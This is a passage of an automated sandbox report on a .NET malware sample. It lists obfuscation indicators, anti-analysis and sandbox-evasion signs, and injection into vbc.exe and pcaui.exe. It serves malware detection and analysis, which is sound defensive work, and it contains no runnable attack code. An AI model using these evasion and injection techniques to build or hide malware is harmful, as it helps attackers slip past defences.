                      Source: Binary string: vbc.pdb source: pcaui.exe, 00000008.00000002.4468565676.0000000004AB9000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000008.00000002.4468773018.000000000501C000.00000004.10000000.00040000.00000000.sdmp, pDqSqZXvqQcT.exe, 0000000A.00000000.2258003464.00000000027FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2475852110.000000003848C000.00000004.80000000.00040000.00000000.sdmp
                      Source: Binary string: System.Windows.Forms.pdb93405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: W3MzrFzSF0.exe, 00000000.00000002.2070763334.0000000005FE9000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: pcaui.pdbGCTL source: vbc.exe, 00000006.00000002.2172466807.00000000053E8000.00000004.00000020.00020000.00000000.sdmp, pDqSqZXvqQcT.exe, 00000007.00000002.4467005035.0000000000558000.00000004.00000020.00020000.00000000.sdmp

                      Data Obfuscation

                      Source: 0.2.W3MzrFzSF0.exe.5670000.3.raw.unpack, id.cs, .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, z2xNW56F1ZH2jZTKon.cs, .Net Code: C9lfi6UOWB System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.W3MzrFzSF0.exe.3dfe968.2.raw.unpack, z2xNW56F1ZH2jZTKon.cs, .Net Code: C9lfi6UOWB System.Reflection.Assembly.Load(byte[])
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe, Code function: 0_2_013947AF push esi; iretd 0_2_013947B2
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe, Code function: 0_2_01394659 push edx; iretd 0_2_0139465A
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe, Code function: 0_2_013946B9 push ebx; iretd 0_2_013946BA
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe, Code function: 0_2_013946BB push edx; iretd 0_2_013946BE
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe, Code function: 0_2_013946BF push ebx; iretd 0_2_013946C2
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe, Code function: 0_2_052C939C pushfd ; retf 0_2_052CA921
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe, Code function: 0_2_058BA0C0 push esp; retn 0004h 0_2_058BA0DC
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe, Code function: 0_2_058BCB6A push eax; retf 0_2_058BCB71
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe, Code function: 0_2_058BCB68 pushad ; retf 0_2_058BCB69
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe, Code function: 6_2_004030C0 push eax; ret 6_2_004030C2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe, Code function: 6_2_0040D0E4 push edx; retf 6_2_0040D0E5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe, Code function: 6_2_0040808C push esp; ret 6_2_00408097
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe, Code function: 6_2_00417257 push 00000020h; iretd 6_2_00417259
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe, Code function: 6_2_00417260 pushad ; retf 6_2_0041726B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe, Code function: 6_2_00417A64 push ecx; ret 6_2_00417A78
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe, Code function: 6_2_0041EA38 push eax; retf 6_2_0041EA4B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe, Code function: 6_2_004172D4 pushad ; retf 6_2_0041726B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe, Code function: 6_2_0041EA8D push esp; retf 6_2_0041EA8E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe, Code function: 6_2_00416797 push ds; iretd 6_2_004167A2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe, Code function: 6_2_058527FA pushad ; ret 6_2_058527F9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe, Code function: 6_2_0585225F pushad ; ret 6_2_058527F9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe, Code function: 6_2_058809AD push ecx; mov dword ptr [esp], ecx 6_2_058809B6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe, Code function: 6_2_0585283D push eax; iretd 6_2_05852858
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe, Code function: 6_2_05851368 push eax; iretd 6_2_05851369
                      Source: C:\Windows\SysWOW64\pcaui.exe, Code function: 8_2_047627FA pushad ; ret 8_2_047627F9
                      Source: C:\Windows\SysWOW64\pcaui.exe, Code function: 8_2_0476225F pushad ; ret 8_2_047627F9
                      Source: C:\Windows\SysWOW64\pcaui.exe, Code function: 8_2_0476283D push eax; iretd 8_2_04762858
                      Source: C:\Windows\SysWOW64\pcaui.exe, Code function: 8_2_047909AD push ecx; mov dword ptr [esp], ecx 8_2_047909B6
                      Source: C:\Windows\SysWOW64\pcaui.exe, Code function: 8_2_02814211 pushad ; retf 8_2_028141A8
                      Source: C:\Windows\SysWOW64\pcaui.exe, Code function: 8_2_02814194 push 00000020h; iretd 8_2_02814196
                      Source: C:\Windows\SysWOW64\pcaui.exe, Code function: 8_2_0281419D pushad ; retf 8_2_028141A8
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, XsIscADSqAfOW73RNQ.csHigh entropy of concatenated method names: 'Dt8A5uVl4l', 'jbgAs7D1dn', 'J7vAw9lZJY', 'DZnADmKfeu', 'uiGAhSquZI', 'bJPAkPwlZ3', 'hJbAx651t2', 't4JAbLamQ3', 'sWlAmedQI3', 'cl2AEoAQhL'
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, cnsSNVMCUYZhqpICBr.csHigh entropy of concatenated method names: 'TFYu7lfLoe', 'nZ5u16xR1V', 'ryuAByNWjA', 'QeKAyjlCIn', 'rgWArNvIMW', 'kKPA4Jd4BN', 'PChALmgcDx', 'cyJAl4I0Bm', 'a6dAoTRyP2', 'xmFASGlbE0'
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, dxnwfWo1hwohEfxBel.csHigh entropy of concatenated method names: 'KDBg9b54HI', 'VBSg3spwXi', 'twCgij0Hrt', 'qang5Gg6II', 'Qo3g7NAj93', 'FyKgsHpReh', 'oEYg1FI7pT', 'vFAgw7E7gq', 'll6gDoWYx3', 'jlogMNYsfm'
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, l4AVtveKkOdZVCL4LB.csHigh entropy of concatenated method names: 'CDWPviF0Za', 'Uo3PVyXg6D', 'vtEPubsanL', 'zs3PgL1aXP', 'YfIP6MONkG', 'GkMuQT78fb', 'RKBuCswdjA', 'N1cuWxgn98', 'LRcunACgDZ', 'LeCutm3ym6'
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, sp1lDdRRnrqqK3bpA0V.csHigh entropy of concatenated method names: 'mnUETFyasX', 'Rh1EzLqPad', 'z6EcUqqHYX', 'fnhcRlSp3j', 'xmOcFMJpx2', 'GtMcakhZhM', 'woWcfc48Zx', 'gBucvObXUN', 'v53cJHAONC', 'duWcVAVU97'
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, z2xNW56F1ZH2jZTKon.csHigh entropy of concatenated method names: 'HWiav0ykQt', 'IQBaJtCWNU', 'B4aaVYBBUg', 'pS3aAxip2W', 'MUuau5jyuH', 'U7QaPXxLM3', 'N9OagA60dH', 'RSOa6kWaCV', 'BpKaKNPROS', 'jVHaXpArOq'
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, qvsr92fm6GDDkDm7X7.csHigh entropy of concatenated method names: 'duIRgPUKR5', 'vS9R6CW8ki', 'gSqRXAfOW7', 'yRNRqQansS', 'HICRhBrX4A', 'gtvRkKkOdZ', 'SgqAF8reetDQ1fXeH7', 'Ely01JmLid1cbMACtS', 'oQeRRKB4yY', 'tgORa5uN9L'
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, i79tYwzmrScsCg7BCX.csHigh entropy of concatenated method names: 'k59Esu4n50', 'gDCEwwgGxe', 'vTbEDbUTSk', 'P4NEe5B8WX', 'OwlEpcU54u', 'IPAEyFKNde', 'aQAErGJRF7', 'XGhE2chMDl', 'fbsE95uab2', 'JIrE3YCuXt'
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, xFXs66RfPcaMhhhXaWe.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wPGjmxuxKX', 'sQljEkoC5C', 'yBNjctBFj7', 'RYgjjiJwbP', 'YFXjZCg7BN', 'WiHjYOl8se', 'W7pj2QXXWT'
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, PPUKR5wZS9CW8kiXFb.csHigh entropy of concatenated method names: 'cokVduJeCG', 'gIZVGruRCO', 'xmRVNV2uUh', 'm1tV8hush9', 'rK8VQc1yO5', 'LoHVCCnjyt', 'zyoVW1YWhv', 'OULVnKmpWN', 'eV5Vt2eP1l', 'sHBVT2yaJA'
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, j6G0lPT5d0C3ab4ktI.csHigh entropy of concatenated method names: 'gjMEADBY0U', 'i39Euv0iNI', 'PSbEPDrBk9', 'f7REgOmqFt', 'ICOEmKl1oF', 'IiIE6kKmjC', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, A2t7lBLdUoLTXrFHYD.csHigh entropy of concatenated method names: 'bjLgJbJUtv', 'U08gA0DFNA', 'HQ6gPr5YYi', 'GXJPTXSZHg', 'hGZPzIdvtD', 'ysbgUTpR3v', 'gddgR9t625', 'npmgFdJNGj', 'KY6gaKDCwT', 'FwRgfp4j1E'
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, MlTvVWW80oPgjXVCSK.csHigh entropy of concatenated method names: 'ORamhTO2cT', 'T2kmx32LDw', 'xJwmmtT2Cu', 'wQfmchxIsq', 'mkFmZB5PS6', 'an8m2WKWE0', 'Dispose', 'tOBbJEMW28', 'ULubVsuQ5X', 'UnVbA7Ki3Z'
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, BEm3b2t8ZooiFqvwgO.csHigh entropy of concatenated method names: 'OOtmeiktap', 'yK8mpxTyY8', 'ABYmBNiMah', 'niDmygUZU3', 'FF7mraZn7T', 'gixm43yOlo', 'Sc0mL4SAM6', 'RtPmlEMse9', 'wXtmomreJv', 'QSBmSXaURY'
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, mmaSdf0UJqIPKo4hqT.csHigh entropy of concatenated method names: 'vNZHwRO4Y3', 'YN3HDuEn8j', 'RdDHetv0SI', 'I1MHpJUurH', 'UeXHy6Cjqv', 'AQOHrT5iI9', 'NsoHLG55Qk', 'Jv6Hl9UGl7', 'QhbHS5FCob', 'AsrHOr01lS'
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, GwuH3CdsRsmh9OqFE9.csHigh entropy of concatenated method names: 'zY5hSs9GTA', 'gmkhInbkoD', 'YnMhd7Q8AK', 'YCshGW7hmD', 'rgAhpEgiXF', 'rRthBi13e6', 'AXGhySQsuU', 'lAehrBLlix', 'nnZh4HVY4K', 'UvbhLZrHr1'
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, F1lwPVF41FEZb53qRh.csHigh entropy of concatenated method names: 'gjaiJiYCI', 'bhM5yH5GC', 'efls7PTBx', 'Ux11wvg9X', 'AJ2DCqT1b', 'e6KM1lhlD', 'nBf4eNcQRHG65Q7r6H', 'Wk4oaTCRf3AZFxj6DR', 'SE8bHGOU4', 'FvfEQHEb5'
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, e9rxZJNgVmTvgJYWCE.csHigh entropy of concatenated method names: 'ToString', 'pnNkOvAdcq', 'nDfkpT6tbP', 'zYFkB7o5f9', 'y6oky89n6b', 'X63krD2inm', 'umyk48S7y4', 'K0AkLRTDqQ', 'EQQklOgqfB', 'd1Rko4VIPE'
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, uSDqqFVdXg1Ch03CNt.csHigh entropy of concatenated method names: 'Dispose', 'MPgRtjXVCS', 'dCJFpSqoYl', 'P2ocKLlTVu', 'l3XRThK2FA', 'SDxRzfQSh2', 'ProcessDialogKey', 'wQ7FUEm3b2', 'TZoFRoiFqv', 'DgOFFg6G0l'
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, CIDwwdCastJyY1nYgh.csHigh entropy of concatenated method names: 'iaKxn0RRT3', 'OCSxTwFcfG', 'WwObUYuwdP', 'RkxbRsbIpm', 'I3ExO4IK0p', 'NB3xIKrSvv', 'Dvvx0cZsGa', 'PZ6xd33Dvb', 'vfhxGcpvRR', 'iKIxNnIBfd'

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe, Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\pcaui.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: C:\Windows\SysWOW64\pcaui.exe API/Special instruction interceptor: Address: 7FF8C88ED324
                      Source: C:\Windows\SysWOW64\pcaui.exe API/Special instruction interceptor: Address: 7FF8C88ED7E4
                      Source: C:\Windows\SysWOW64\pcaui.exe API/Special instruction interceptor: Address: 7FF8C88ED944
                      Source: C:\Windows\SysWOW64\pcaui.exe API/Special instruction interceptor: Address: 7FF8C88ED504
                      Source: C:\Windows\SysWOW64\pcaui.exe API/Special instruction interceptor: Address: 7FF8C88ED544
                      Source: C:\Windows\SysWOW64\pcaui.exe API/Special instruction interceptor: Address: 7FF8C88ED1E4
                      Source: C:\Windows\SysWOW64\pcaui.exe API/Special instruction interceptor: Address: 7FF8C88F0154
                      Source: C:\Windows\SysWOW64\pcaui.exe API/Special instruction interceptor: Address: 7FF8C88EDA44
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Memory allocated: 1350000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Memory allocated: 2D10000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Memory allocated: 4D10000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Memory allocated: 8EB0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Memory allocated: 9EB0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Memory allocated: A0B0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Memory allocated: B0B0000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 6_2_058C096E rdtsc 6_2_058C096E
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6077
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3644
                      Source: C:\Windows\SysWOW64\pcaui.exe Window / User API: threadDelayed 675
                      Source: C:\Windows\SysWOW64\pcaui.exe Window / User API: threadDelayed 9297
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe API coverage: 0.7 %
                      Source: C:\Windows\SysWOW64\pcaui.exe API coverage: 2.6 %
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe TID: 6292 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3200 Thread sleep time: -7378697629483816s >= -30000s
                      Source: C:\Windows\SysWOW64\pcaui.exe TID: 6524 Thread sleep count: 675 > 30
                      Source: C:\Windows\SysWOW64\pcaui.exe TID: 6524 Thread sleep time: -1350000s >= -30000s
                      Source: C:\Windows\SysWOW64\pcaui.exe TID: 6524 Thread sleep count: 9297 > 30
                      Source: C:\Windows\SysWOW64\pcaui.exe TID: 6524 Thread sleep time: -18594000s >= -30000s
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe TID: 4324 Thread sleep time: -70000s >= -30000s
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe TID: 4324 Thread sleep count: 33 > 30
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe TID: 4324 Thread sleep time: -49500s >= -30000s
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe TID: 4324 Thread sleep count: 34 > 30
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe TID: 4324 Thread sleep time: -34000s >= -30000s
                      Source: C:\Windows\SysWOW64\pcaui.exe Last function: Thread delayed
                      Source: C:\Windows\SysWOW64\pcaui.exe Code function: 8_2_0281C920 FindFirstFileW,FindNextFileW,FindClose, 8_2_0281C920
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Process queried: DebugPort
                      Source: C:\Windows\SysWOW64\pcaui.exe Process queried: DebugPort
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 6_2_00417983 LdrLoadDll, 6_2_00417983
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 6_2_058B4588 mov eax, dword ptr fs:[00000030h] 6_2_058B4588
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 6_2_05882582 mov eax, dword ptr fs:[00000030h] 6_2_05882582
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 6_2_05882582 mov ecx, dword ptr fs:[00000030h] 6_2_05882582
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 6_2_058BE59C mov eax, dword ptr fs:[00000030h] 6_2_058BE59C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 6_2_059005A7 mov eax, dword ptr fs:[00000030h] 6_2_059005A7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 6_2_058A45B1 mov eax, dword ptr fs:[00000030h] 6_2_058A45B1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 6_2_058BE5CF mov eax, dword ptr fs:[00000030h] 6_2_058BE5CF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 6_2_058865D0 mov eax, dword ptr fs:[00000030h] 6_2_058865D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 6_2_058BA5D0 mov eax, dword ptr fs:[00000030h] 6_2_058BA5D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 6_2_058BC5ED mov eax, dword ptr fs:[00000030h] 6_2_058BC5ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 6_2_058825E0 mov eax, dword ptr fs:[00000030h] 6_2_058825E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 6_2_058AE5E7 mov eax, dword ptr fs:[00000030h] 6_2_058AE5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 6_2_05916500 mov eax, dword ptr fs:[00000030h] 6_2_05916500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 6_2_05954500 mov eax, dword ptr fs:[00000030h] 6_2_05954500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 6_2_058AE53E mov eax, dword ptr fs:[00000030h] 6_2_058AE53E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 6_2_05890535 mov eax, dword ptr fs:[00000030h] 6_2_05890535
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 6_2_05888550 mov eax, dword ptr fs:[00000030h] 6_2_05888550
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 6_2_058B656A mov eax, dword ptr fs:[00000030h] 6_2_058B656A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 6_2_0593A49A mov eax, dword ptr fs:[00000030h] 6_2_0593A49A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 6_2_0590A4B0 mov eax, dword ptr fs:[00000030h] 6_2_0590A4B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 6_2_058864AB mov eax, dword ptr fs:[00000030h] 6_2_058864AB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 6_2_058B44B0 mov ecx, dword ptr fs:[00000030h] 6_2_058B44B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 6_2_058804E5 mov ecx, dword ptr fs:[00000030h] 6_2_058804E5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B8402 mov eax, dword ptr fs:[00000030h]6_2_058B8402
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B8402 mov eax, dword ptr fs:[00000030h]6_2_058B8402
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B8402 mov eax, dword ptr fs:[00000030h]6_2_058B8402
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587C427 mov eax, dword ptr fs:[00000030h]6_2_0587C427
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587E420 mov eax, dword ptr fs:[00000030h]6_2_0587E420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587E420 mov eax, dword ptr fs:[00000030h]6_2_0587E420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587E420 mov eax, dword ptr fs:[00000030h]6_2_0587E420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05906420 mov eax, dword ptr fs:[00000030h]6_2_05906420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05906420 mov eax, dword ptr fs:[00000030h]6_2_05906420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05906420 mov eax, dword ptr fs:[00000030h]6_2_05906420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05906420 mov eax, dword ptr fs:[00000030h]6_2_05906420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05906420 mov eax, dword ptr fs:[00000030h]6_2_05906420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05906420 mov eax, dword ptr fs:[00000030h]6_2_05906420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05906420 mov eax, dword ptr fs:[00000030h]6_2_05906420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BA430 mov eax, dword ptr fs:[00000030h]6_2_058BA430
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0593A456 mov eax, dword ptr fs:[00000030h]6_2_0593A456
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BE443 mov eax, dword ptr fs:[00000030h]6_2_058BE443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BE443 mov eax, dword ptr fs:[00000030h]6_2_058BE443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BE443 mov eax, dword ptr fs:[00000030h]6_2_058BE443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BE443 mov eax, dword ptr fs:[00000030h]6_2_058BE443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BE443 mov eax, dword ptr fs:[00000030h]6_2_058BE443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BE443 mov eax, dword ptr fs:[00000030h]6_2_058BE443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BE443 mov eax, dword ptr fs:[00000030h]6_2_058BE443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BE443 mov eax, dword ptr fs:[00000030h]6_2_058BE443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058A245A mov eax, dword ptr fs:[00000030h]6_2_058A245A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587645D mov eax, dword ptr fs:[00000030h]6_2_0587645D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0590C460 mov ecx, dword ptr fs:[00000030h]6_2_0590C460
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058AA470 mov eax, dword ptr fs:[00000030h]6_2_058AA470
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058AA470 mov eax, dword ptr fs:[00000030h]6_2_058AA470
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058AA470 mov eax, dword ptr fs:[00000030h]6_2_058AA470
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0592678E mov eax, dword ptr fs:[00000030h]6_2_0592678E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058807AF mov eax, dword ptr fs:[00000030h]6_2_058807AF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059347A0 mov eax, dword ptr fs:[00000030h]6_2_059347A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0588C7C0 mov eax, dword ptr fs:[00000030h]6_2_0588C7C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059007C3 mov eax, dword ptr fs:[00000030h]6_2_059007C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058A27ED mov eax, dword ptr fs:[00000030h]6_2_058A27ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058A27ED mov eax, dword ptr fs:[00000030h]6_2_058A27ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058A27ED mov eax, dword ptr fs:[00000030h]6_2_058A27ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0590E7E1 mov eax, dword ptr fs:[00000030h]6_2_0590E7E1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058847FB mov eax, dword ptr fs:[00000030h]6_2_058847FB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058847FB mov eax, dword ptr fs:[00000030h]6_2_058847FB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BC700 mov eax, dword ptr fs:[00000030h]6_2_058BC700
